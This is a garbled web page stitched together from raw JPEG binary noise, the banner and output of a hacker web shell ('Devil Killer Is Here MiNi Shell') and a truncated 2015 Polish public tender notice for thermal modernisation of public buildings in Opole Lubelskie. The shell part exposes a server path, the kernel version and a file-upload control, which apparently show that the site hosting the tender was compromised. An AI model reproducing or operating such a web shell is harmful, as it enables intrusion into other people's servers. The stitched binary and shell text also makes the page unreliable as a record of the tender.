JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150504/62955-N-2015.html

<p class="kh_header"><b>Opole Lubelskie: Wykonanie robót budowlanych dla zadania pn.Termomodernizacja budynków użyteczności publicznej</b><br>
<b>Numer ogłoszenia: 62955 - 2015; data zamieszczenia: 04.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opolski , ul. Lubelska 4, 24-300 Opole Lubelskie, woj. lubelskie, tel. 081 8276122, faks 081 8272236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opole.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla zadania pn.Termomodernizacja budynków użyteczności publicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, polegające na przeprowadzeniu termomodernizacji jedenastu czynnych budynków użyteczności publicznej tj.:
1) Budynków Powiatowego Centrum Zdrowia Sp. z o.o. w Opolu Lubelskim  przy ul. Szpitalna 9, działka nr ewid. 24/2 w tym:
a) budynek Oddziału Wewnętrznego i Izby Przyjęć, wybudowany  w latach sześćdziesiątych, dwukondygnacyjny z podpiwniczeniem, pow. zabudowy 253 m2,
b) budynek Oddziału Internistyczno - Kardiologicznego, wybudowany w latach sześćdziesiątych, dwukondygnacyjny z podpiwniczeniem, pow. zabudowy 305 m2,
c) budynek Laboratorium Szpitalnego, wybudowany w latach sześćdziesiątych, dwukondygnacyjny, pow. zabudowy 84,5 m2.
2) budynku Zakładu Opiekuńczo - Leczniczego w Opolu Lubelskim przy ul. Szpitalna 9, działka nr ewid. 24/2, składającego się z dwóch części, starej należącej do zabudowań dawnego kompleksu pałacowego o pow. zabudowy 397 m2, i części dobudowanej później o pow. zabudowy 209 m2 -  Część zabytkowa jest wpisana do rejestru zabytków  woj. lubelskiego pod nr A/448
3) Budynku administracyjnego położonego przy ul. Przemysłowa 4a w Opolu Lubelskim, działka nr 390/1 i 390/2, rok budowy 1995 r. o pow. zabudowy 529 m2, budynek dwukondygnacyjny z podpiwniczeniem
4) Budynku administracyjnego  położonego przy ul. Lubelska 4  w Opolu Lubelskim, działka nr 90/3, pow. użytkowa 2019 m2,  budynek trzykondygnacyjny, podpiwniczony.
Budynek będący przedmiotem zamówienia dla zadania znajduje się w zabytkowym układzie urbanistycznym.
5) Budynków szkolnych Specjalnego Ośrodka Szkolno - Wychowawczego w Karczmiskach, działka nr 1107/14, w tym:
a) budynku zaplecza warsztatów - trzykondygnacyjny o pow. zabudowy 175 m2, kubatura 2007 m3,
b) hali  warsztatów  nr A o pow. zabudowy 406 m2,
c) hali warsztatów  nr B o pow. zabudowy 321 m2,
d) części warsztatów położonych przy zapleczu sanitarno - socjalnym Orlik, o powierzchni  zabudowy 354 m2
Budynki będące przedmiotem zamówienia dla zadania znajdują się w zabytkowym układzie urbanistycznym.
6) Budynku warsztatów Zespołu Szkół w Poniatowej przy ul Fabrycznej 16C, działka nr 429/21,
Zakres robót budowlanych został podzielony na 6 zadań, szczegółowy zakres robót dla poszczególnych zadań oraz ich lokalizację zawiera dokumentacja techniczna, w tym dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót, przedmiary robót będące załącznikami do specyfikacji oraz załączniki do niniejszego ogłoszenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.11.00-7, 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 
Zadanie nr 1 -  14.500,00 PLN (słownie: czternaście tysięcy pięćset złotych);
Zadanie nr 2 - 11.600,00 PLN (słownie: jedenaście tysięcy sześćset złotych);
Zadanie nr 3 - 12.600,00 PLN (słownie: dwanaście tysięcy sześćset złotych);
Zadanie nr 4 -  8.500,00 PLN (słownie: osiem tysięcy pięćset złotych);
Zadanie nr 5 -  17.800,00 PLN siedemnaście tysięcy osiemset złotych);
Zadanie Nr 6 -  16.200,00 PLN (słownie: szesnaście tysięcy dwieście złotych);
- dla całości przedmiotu zamówienia 81.200,00 PLN (słownie: osiemdziesiąt jeden tysięcy dwieście złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według zasady spełnia/nie spełnia na podstawie wymaganego oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 3 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według zasady spełnia/nie spełnia na podstawie wymaganego Wykazu wykonanych robót budowlanych dokumentującego wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej o podobnym charakterze i zakresie zgodnym z przedmiotem zamówienia dla danego zadania termomodernizacji budynków użyteczności publicznej o wartości nie mniejszej niż: zadanie nr 1 - 400.000 PLN; zadanie nr 2 - 300.000 PLN; zadanie nr 3 - 350.000 PLN; zadanie nr 4 - 250.000 PLN; zadanie nr 5 - 450.000 PLN; zadanie nr 6 - 450.000 PLN - z podaniem ich rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dokumentów najważniejszych robót potwierdzających, że zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej - którego wzór określono w załączniku do specyfikacji nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według zasady spełnia/nie spełnia na podstawie wymaganego oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru stanowiącego załącznik nr 3 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według zasady spełnia/nie spełnia na podstawie wymaganego wykazu osób odpowiedzialnych za realizację przedmiotu zamówienia. Zamawiający wymaga wykazania, że Wykonawca dysponuje lub będzie dysponował osobami z uprawnieniami budowlanymi do kierowania robotami budowlanymi w odpowiednich specjalnościach dla obsadzenia stanowisk: 
a) kierownika budowy posiadającego co najmniej 5 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi w specjalności konstrukcyjno - budowlanej na stanowisku kierownika budowy - oraz w przypadku zadania nr 2 odbyły co najmniej 2 - letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków - lub kierownika robót wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa;
b) kierownika robót instalacyjnych posiadającego co najmniej 2-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy sieci i instalacji c.o., w tym wykonanie instalacji centralnego ogrzewania, a także wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>według zasady spełnia/nie spełnia na podstawie wymaganej polisy potwierdzającej posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą gwarantowaną co najmniej 1.000.000 PLN na jedno i wszystkie zadania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) uproszczony kosztorys ofertowy;
2) podpisany i uzupełniony wzór umowy jako akceptacji jej treści i warunków wg załącznika nr 6 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy - Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na:
1) zmianie rozwiązań technicznych w dokumentacji projektowej wykonania zamówienia:                    
a) na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót; dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt, a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty; w tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami; projekt wymaga zatwierdzenia przez projektanta, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego; powyższe zmiany nie mogą zmieniać terminu zakończenia robót,
b) w uzasadnionych przypadkach, za zgodą Zamawiającego gdy realizacja zadania według dokumentacji technicznej i SST powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian w stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót,
c) w przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, sporządza on protokół konieczności, a następnie dostarcza dokumentację projektową na te roboty; zmiany techniczne mogą powodować zmianę terminu zakończenia zamówienia podstawowego. 
2) zmianie dotyczącej zakresu robót i wynagrodzenia, jeżeli wystąpią: 
a) nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty; w takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia;
b) okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane roboty budowlane pozostają do całości robót określonych umową; 
3) zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu,
4) zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań; jeżeli wykonanie umowy jest niemożliwe z powodu siły wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe; Wykonawca zabezpieczy teren budowy tak szybko jak jest to możliwe i wstrzyma roboty, a Zamawiający zapłaci wynagrodzenie za wykonane robot.
Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy spowodowanych zmianą ustawowej stawki podatku od towarów i usług (VAT)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://spopolelubelskie.bip.lubelskie.pl/index.php?id=83<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe ul. Lubelska 4, 24-300 Opole Lubelskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2015 godzina 10:00, miejsce: Starostwo Powiatowe ul. Lubelska 4, 24-300 Opole Lubelskie, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014 w ramach Programu PL04 Oszczędzanie energii i promowanie odnawialnych źródeł energii.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynków Powiatowego Centrum Zdrowia Sp. z o.o. w Opolu Lubelskim  przy ul. Szpitalna 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1. budynek Oddziału Wewnętrznego i Izby Przyjęć z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 14 cm o powierzchni 292,44 m2;
2) Wykonanie ocieplenia ścian zewnętrznych piwnic styropianem grubości 14 cm o powierzchni 69,63 m2;
3) Wykonanie ocieplenia ścian zewnętrznych klatki schodowej styropianem grubości 14 cm o powierzchni 64,44 m2;
4) Usunięcie balkonów żelbetowych długości 24 mb;
5) Wykonanie docieplenia stropu zewnętrznego nad wejściem styropianem grubości 20 cm o powierzchni 8,72 m2;
6) Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi 6,63 m2;
7) Wymiana stolarki drzwiowej na aluminiową 5,18 m2;
8) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w grzejniki wraz z zaworami termostatycznymi 62 szt.;
9) Wykonanie instalacji odgromowej 1kpl.;
10) Wykonaniu opaski betonowej o nawierzchni z kostki brukowej o powierzchni 27,23 m2;
11) Wykonanie remontu kominów 10,12 m2.
2. budynek Oddziału Internistyczno - Kardiologicznego z następującym zakresem robót:
1) Wykonanie ocieplenia ściany zewnętrznej styropianem grubości 15 cm o powierzchni 346,09 m2;
2) Wykonanie ocieplenia ścian zewnętrznych piwnic styropianem grubości 15 cm o powierzchni 72,06 m2;
3) Wykonanie ocieplenia ścian zewnętrznych klatki schodowej styropianem grubości 15 cm o powierzchni 12,59 m2;
4) Wykonanie ocieplenia stropu pod nieogrzewanym poddaszem wełną mineralną grubości 21 cm o powierzchni 279,01 m2;
5) Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi 38,34 m2;
6) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w grzejniki wraz z zaworami termostatycznymi 53 szt.;
7) Wykonanie instalacji odgromowej 1 kpl;
8) Wykonaniu wzmocnienia ścian ściągami stalowymi 1 kpl;
9) Wymiana pokrycia dachowego z eternitu na pokrycie z blachodachówki powlekanej 420,53 m2;
10) Wykonaniu opaski  z kostki brukowej 47,59 m2;
11) Wykonanie remontu kominów 41,5 m2;
12) Wymiana stolarki drzwiowej 2,87 m2.
3. budynek Laboratorium Szpitalnego z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 15 cm o powierzchni 158,29 m2;
2) Wykonanie ocieplenia ścian zewnętrznych piwnic styropianem o grubości 15 cm o powierzchni 38,78 m2;
3) Wykonanie ocieplenia stropodachu niewentylowanego metodą wdmuchu wełną mineralną granulowaną o grubości 22 cm o powierzchni 84,02 m2;
4) Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi 6,58 m2;
5) Wymiana stolarki drzwiowej na aluminiową 7,2 m2;
6) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w grzejniki wraz z zaworami termostatycznymi 11 szt.;
7) Wykonanie opaski z kostki brukowej o powierzchni 28,51 m2;
8) Wykonanie instalacji odgromowej 1 kpl;
9) Wykonanie remontu kominów 2,32 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.11.00-7, 45.42.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku Zakładu Opiekuńczo - Leczniczego położonego przy ul. Szpitalnej 9 w Opolu Lubelskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie ocieplenia ścian od wewnątrz bloczkami YTONG MULTIPOOR o grubości 18 cm o powierzchni 171,92 m2;
2. Wykonanie ocieplenia ścian zewnętrznych wraz z obróbkami styropianem grubości 14 cm o powierzchni 155,00 m2;
3. Wykonanie ocieplenia ścian od wewnątrz bloczkami YTONG MULTIPOOR o grubości 16 cm o powierzchni 34,37 m2; 
